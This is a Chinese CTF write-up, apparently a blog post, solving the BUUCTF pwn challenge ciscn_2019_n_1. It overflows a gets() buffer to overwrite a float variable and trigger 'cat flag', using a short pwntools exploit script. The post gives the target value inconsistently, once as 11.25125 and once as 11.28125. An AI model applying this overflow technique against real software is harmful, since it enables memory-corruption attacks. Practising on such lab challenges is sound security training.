BUUCTF PWN ciscn_2019_n_1
2021/9/11 6:07:48
本文主要是介绍BUUCTF PWN ciscn_2019_n_1,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
拿到文件先checksec
仅开启了NX保护
放入IDA中
查看main函数很简单,没有什么明显漏洞
发现了func函数,双击试试看
可以看到只要v2等于11.25125就可以执行cat flag命令
先把11.28125转为16进制,放着备用(0x41348000)
我们的思路就是利用gets这个危险函数,通过覆盖v1的地址来修改v2的值,进而执行system命令,拿到flag。
写脚本
from pwn import * p=remote('node4.buuoj.cn',25989) payload='a'*0x2c+p64(0x41348000) p.recvuntil("Let's guess the number.") p.sendline(payload) p.interactive()
运行试试
拿到flag!
这篇关于BUUCTF PWN ciscn_2019_n_1的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升